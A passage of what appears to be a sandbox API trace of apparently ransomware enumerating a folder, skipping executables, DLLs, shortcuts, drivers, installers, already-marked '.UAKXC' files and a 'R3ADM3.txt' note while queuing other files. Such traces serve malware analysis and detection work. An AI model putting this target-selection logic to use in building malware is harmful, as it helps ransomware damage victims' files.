lpSrch=".dll") returned 0x0 [0159.326] StrStrIW (lpFirst="Installed_schemas14.xss", lpSrch=".lnk") returned 0x0 [0159.326] StrStrIW (lpFirst="Installed_schemas14.xss", lpSrch=".sys") returned 0x0 [0159.326] StrStrIW (lpFirst="Installed_schemas14.xss", lpSrch=".msi") returned 0x0 [0159.326] StrStrIW (lpFirst="Installed_schemas14.xss", lpSrch="R3ADM3.txt") returned 0x0 [0159.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0159.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34b80 [0159.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0159.326] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34cb0 [0159.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0cf0 [0159.327] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34f10 [0159.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34cb0 | out: hHeap=0xea0000) returned 1 [0159.327] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.327] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bf65300, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xd5938280, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2bf65300, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x17380, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INTLDATE.DLL", cAlternateFileName="")) returned 1 [0159.327] lstrcmpW (lpString1="INTLDATE.DLL", lpString2=".") returned 1 [0159.327] lstrcmpW (lpString1="INTLDATE.DLL", lpString2="..") returned 1 [0159.327] StrStrIW (lpFirst="INTLDATE.DLL", lpSrch=".UAKXC") returned 0x0 [0159.327] StrStrIW (lpFirst="INTLDATE.DLL", lpSrch=".exe") returned 0x0 [0159.327] StrStrIW (lpFirst="INTLDATE.DLL", lpSrch=".dll") returned=".DLL" [0159.327] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36330000, ftCreationTime.dwHighDateTime=0x1cacf91, ftLastAccessTime.dwLowDateTime=0x64a2d290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x36330000, ftLastWriteTime.dwHighDateTime=0x1cacf91, nFileSizeHigh=0x0, nFileSizeLow=0x98b578, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IPDESIGN.DLL", cAlternateFileName="")) returned 1 [0159.327] lstrcmpW (lpString1="IPDESIGN.DLL", lpString2=".") returned 1 [0159.327] lstrcmpW (lpString1="IPDESIGN.DLL", lpString2="..") returned 1 [0159.327] StrStrIW (lpFirst="IPDESIGN.DLL", lpSrch=".UAKXC") returned 0x0 [0159.327] StrStrIW (lpFirst="IPDESIGN.DLL", lpSrch=".exe") returned 0x0 [0159.327] StrStrIW (lpFirst="IPDESIGN.DLL", lpSrch=".dll") returned=".DLL" [0159.327] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3501d300, ftCreationTime.dwHighDateTime=0x1cacf91, ftLastAccessTime.dwLowDateTime=0x64cdab50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3501d300, ftLastWriteTime.dwHighDateTime=0x1cacf91, nFileSizeHigh=0x0, nFileSizeLow=0x8a4d70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IPEDITOR.DLL", cAlternateFileName="")) returned 1 [0159.327] lstrcmpW (lpString1="IPEDITOR.DLL", lpString2=".") returned 1 [0159.327] lstrcmpW (lpString1="IPEDITOR.DLL", lpString2="..") returned 1 [0159.327] StrStrIW (lpFirst="IPEDITOR.DLL", lpSrch=".UAKXC") returned 0x0 [0159.327] StrStrIW (lpFirst="IPEDITOR.DLL", lpSrch=".exe") returned 0x0 [0159.327] StrStrIW (lpFirst="IPEDITOR.DLL", lpSrch=".dll") returned=".DLL" [0159.327] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x424a0a00, ftCreationTime.dwHighDateTime=0x1c9244d, ftLastAccessTime.dwLowDateTime=0x543977b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x424a0a00, ftLastWriteTime.dwHighDateTime=0x1c9244d, nFileSizeHigh=0x0, nFileSizeLow=0x1375c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IPIRM.XML", cAlternateFileName="")) returned 1 [0159.327] lstrcmpW (lpString1="IPIRM.XML", lpString2=".") returned 1 [0159.328] lstrcmpW (lpString1="IPIRM.XML", lpString2="..") returned 1 [0159.328] StrStrIW (lpFirst="IPIRM.XML", lpSrch=".UAKXC") returned 0x0 [0159.328] StrStrIW (lpFirst="IPIRM.XML", lpSrch=".exe") returned 0x0 [0159.328] StrStrIW (lpFirst="IPIRM.XML", lpSrch=".dll") returned 0x0 [0159.328] StrStrIW (lpFirst="IPIRM.XML", lpSrch=".lnk") returned 0x0 [0159.328] StrStrIW (lpFirst="IPIRM.XML", lpSrch=".sys") returned 0x0 [0159.328] StrStrIW (lpFirst="IPIRM.XML", lpSrch=".msi") returned 0x0 [0159.328] StrStrIW (lpFirst="IPIRM.XML", lpSrch="R3ADM3.txt") returned 0x0 [0159.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0d18 [0159.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0d18 | out: hHeap=0xea0000) returned 1 [0159.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0d18 [0159.328] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b78 [0159.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.328] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.328] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x424a0a00, ftCreationTime.dwHighDateTime=0x1c9244d, ftLastAccessTime.dwLowDateTime=0x64d730d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x424a0a00, ftLastWriteTime.dwHighDateTime=0x1c9244d, nFileSizeHigh=0x0, nFileSizeLow=0x135a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IPIRMV.XML", cAlternateFileName="")) returned 1 [0159.328] lstrcmpW (lpString1="IPIRMV.XML", lpString2=".") returned 1 [0159.328] lstrcmpW (lpString1="IPIRMV.XML", lpString2="..") returned 1 [0159.328] StrStrIW (lpFirst="IPIRMV.XML", lpSrch=".UAKXC") returned 0x0 [0159.329] StrStrIW (lpFirst="IPIRMV.XML", lpSrch=".exe") returned 0x0 [0159.329] StrStrIW (lpFirst="IPIRMV.XML", lpSrch=".dll") returned 0x0 [0159.329] StrStrIW (lpFirst="IPIRMV.XML", lpSrch=".lnk") returned 0x0 [0159.329] StrStrIW (lpFirst="IPIRMV.XML", lpSrch=".sys") returned 0x0 [0159.329] StrStrIW (lpFirst="IPIRMV.XML", lpSrch=".msi") returned 0x0 [0159.329] StrStrIW (lpFirst="IPIRMV.XML", lpSrch="R3ADM3.txt") returned 0x0 [0159.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0d40 [0159.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0d40 | out: hHeap=0xea0000) returned 1 [0159.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0d40 [0159.329] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9bf0 [0159.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.329] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.329] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f53500, ftCreationTime.dwHighDateTime=0x1cacf2a, ftLastAccessTime.dwLowDateTime=0x64d730d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe1f53500, ftLastWriteTime.dwHighDateTime=0x1cacf2a, nFileSizeHigh=0x0, nFileSizeLow=0x39988, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IPOLK.DLL", cAlternateFileName="")) returned 1 [0159.329] lstrcmpW (lpString1="IPOLK.DLL", lpString2=".") returned 1 [0159.329] lstrcmpW (lpString1="IPOLK.DLL", lpString2="..") returned 1 [0159.329] StrStrIW (lpFirst="IPOLK.DLL", lpSrch=".UAKXC") returned 0x0 [0159.329] StrStrIW (lpFirst="IPOLK.DLL", lpSrch=".exe") returned 0x0 [0159.329] StrStrIW (lpFirst="IPOLK.DLL", lpSrch=".dll") returned=".DLL" [0159.330] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0675200, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x821165a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa0675200, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x551a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IXACS.PDL", cAlternateFileName="")) returned 1 [0159.330] lstrcmpW (lpString1="IXACS.PDL", lpString2=".") returned 1 [0159.330] lstrcmpW (lpString1="IXACS.PDL", lpString2="..") returned 1 [0159.330] StrStrIW (lpFirst="IXACS.PDL", lpSrch=".UAKXC") returned 0x0 [0159.330] StrStrIW (lpFirst="IXACS.PDL", lpSrch=".exe") returned 0x0 [0159.330] StrStrIW (lpFirst="IXACS.PDL", lpSrch=".dll") returned 0x0 [0159.330] StrStrIW (lpFirst="IXACS.PDL", lpSrch=".lnk") returned 0x0 [0159.330] StrStrIW (lpFirst="IXACS.PDL", lpSrch=".sys") returned 0x0 [0159.330] StrStrIW (lpFirst="IXACS.PDL", lpSrch=".msi") returned 0x0 [0159.330] StrStrIW (lpFirst="IXACS.PDL", lpSrch="R3ADM3.txt") returned 0x0 [0159.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0d68 [0159.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0d68 | out: hHeap=0xea0000) returned 1 [0159.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0d68 [0159.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9c68 [0159.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.330] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bf8d00, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x821165a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa8bf8d00, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x34188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IXDB2.PDL", cAlternateFileName="")) returned 1 [0159.330] lstrcmpW (lpString1="IXDB2.PDL", lpString2=".") returned 1 [0159.330] lstrcmpW (lpString1="IXDB2.PDL", lpString2="..") returned 1 [0159.331] StrStrIW (lpFirst="IXDB2.PDL", lpSrch=".UAKXC") returned 0x0 [0159.331] StrStrIW (lpFirst="IXDB2.PDL", lpSrch=".exe") returned 0x0 [0159.331] StrStrIW (lpFirst="IXDB2.PDL", lpSrch=".dll") returned 0x0 [0159.331] StrStrIW (lpFirst="IXDB2.PDL", lpSrch=".lnk") returned 0x0 [0159.331] StrStrIW (lpFirst="IXDB2.PDL", lpSrch=".sys") returned 0x0 [0159.331] StrStrIW (lpFirst="IXDB2.PDL", lpSrch=".msi") returned 0x0 [0159.331] StrStrIW (lpFirst="IXDB2.PDL", lpSrch="R3ADM3.txt") returned 0x0 [0159.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77920e8 [0159.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920e8 | out: hHeap=0xea0000) returned 1 [0159.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x77920e8 [0159.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9ce0 [0159.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.331] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bf8d00, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x821165a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xa8bf8d00, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x16db0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IXGENERC.PDL", cAlternateFileName="")) returned 1 [0159.331] lstrcmpW (lpString1="IXGENERC.PDL", lpString2=".") returned 1 [0159.331] lstrcmpW (lpString1="IXGENERC.PDL", lpString2="..") returned 1 [0159.331] StrStrIW (lpFirst="IXGENERC.PDL", lpSrch=".UAKXC") returned 0x0 [0159.331] StrStrIW (lpFirst="IXGENERC.PDL", lpSrch=".exe") returned 0x0 [0159.332] StrStrIW (lpFirst="IXGENERC.PDL", lpSrch=".dll") returned 0x0 [0159.332] StrStrIW (lpFirst="IXGENERC.PDL", lpSrch=".lnk") returned 0x0 [0159.332] StrStrIW (lpFirst="IXGENERC.PDL", lpSrch=".sys") returned 0x0 [0159.332] StrStrIW (lpFirst="IXGENERC.PDL", lpSrch=".msi") returned 0x0 [0159.332] StrStrIW (lpFirst="IXGENERC.PDL", lpSrch="R3ADM3.txt") returned 0x0 [0159.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792110 [0159.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792110 | out: hHeap=0xea0000) returned 1 [0159.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792110 [0159.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9d58 [0159.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.332] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb117c800, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x821165a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb117c800, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x2ada0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IXOLEDB.PDL", cAlternateFileName="")) returned 1 [0159.332] lstrcmpW (lpString1="IXOLEDB.PDL", lpString2=".") returned 1 [0159.332] lstrcmpW (lpString1="IXOLEDB.PDL", lpString2="..") returned 1 [0159.332] StrStrIW (lpFirst="IXOLEDB.PDL", lpSrch=".UAKXC") returned 0x0 [0159.332] StrStrIW (lpFirst="IXOLEDB.PDL", lpSrch=".exe") returned 0x0 [0159.332] StrStrIW (lpFirst="IXOLEDB.PDL", lpSrch=".dll") returned 0x0 [0159.332] StrStrIW (lpFirst="IXOLEDB.PDL", lpSrch=".lnk") returned 0x0 [0159.332] StrStrIW (lpFirst="IXOLEDB.PDL", lpSrch=".sys") returned 0x0 [0159.333] StrStrIW (lpFirst="IXOLEDB.PDL", lpSrch=".msi") returned 0x0 [0159.333] StrStrIW (lpFirst="IXOLEDB.PDL", lpSrch="R3ADM3.txt") returned 0x0 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792138 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792138 | out: hHeap=0xea0000) returned 1 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792138 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9dd0 [0159.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.333] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb117c800, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x821165a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb117c800, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x63fa0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IXORACLE.PDL", cAlternateFileName="")) returned 1 [0159.333] lstrcmpW (lpString1="IXORACLE.PDL", lpString2=".") returned 1 [0159.333] lstrcmpW (lpString1="IXORACLE.PDL", lpString2="..") returned 1 [0159.333] StrStrIW (lpFirst="IXORACLE.PDL", lpSrch=".UAKXC") returned 0x0 [0159.333] StrStrIW (lpFirst="IXORACLE.PDL", lpSrch=".exe") returned 0x0 [0159.333] StrStrIW (lpFirst="IXORACLE.PDL", lpSrch=".dll") returned 0x0 [0159.333] StrStrIW (lpFirst="IXORACLE.PDL", lpSrch=".lnk") returned 0x0 [0159.333] StrStrIW (lpFirst="IXORACLE.PDL", lpSrch=".sys") returned 0x0 [0159.333] StrStrIW (lpFirst="IXORACLE.PDL", lpSrch=".msi") returned 0x0 [0159.333] StrStrIW (lpFirst="IXORACLE.PDL", lpSrch="R3ADM3.txt") returned 0x0 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792160 [0159.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792160 | out: hHeap=0xea0000) returned 1 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792160 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9e48 [0159.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.334] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac531400, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x821165a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xac531400, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0x2fda8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IXSSRV.PDL", cAlternateFileName="")) returned 1 [0159.334] lstrcmpW (lpString1="IXSSRV.PDL", lpString2=".") returned 1 [0159.334] lstrcmpW (lpString1="IXSSRV.PDL", lpString2="..") returned 1 [0159.334] StrStrIW (lpFirst="IXSSRV.PDL", lpSrch=".UAKXC") returned 0x0 [0159.334] StrStrIW (lpFirst="IXSSRV.PDL", lpSrch=".exe") returned 0x0 [0159.334] StrStrIW (lpFirst="IXSSRV.PDL", lpSrch=".dll") returned 0x0 [0159.334] StrStrIW (lpFirst="IXSSRV.PDL", lpSrch=".lnk") returned 0x0 [0159.334] StrStrIW (lpFirst="IXSSRV.PDL", lpSrch=".sys") returned 0x0 [0159.334] StrStrIW (lpFirst="IXSSRV.PDL", lpSrch=".msi") returned 0x0 [0159.334] StrStrIW (lpFirst="IXSSRV.PDL", lpSrch="R3ADM3.txt") returned 0x0 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792188 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0159.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0159.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0159.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0159.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x7792188 | out: hHeap=0xea0000) returned 1 [0159.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9b00 [0159.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x7792188 [0159.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xef9ec0 [0159.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef9b00 | out: hHeap=0xea0000) returned 1 [0159.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0159.335] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a22a900, ftCreationTime.dwHighDateTime=0x1cb701e, ftLastAccessTime.dwLowDateTime=0xd5adb1a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, 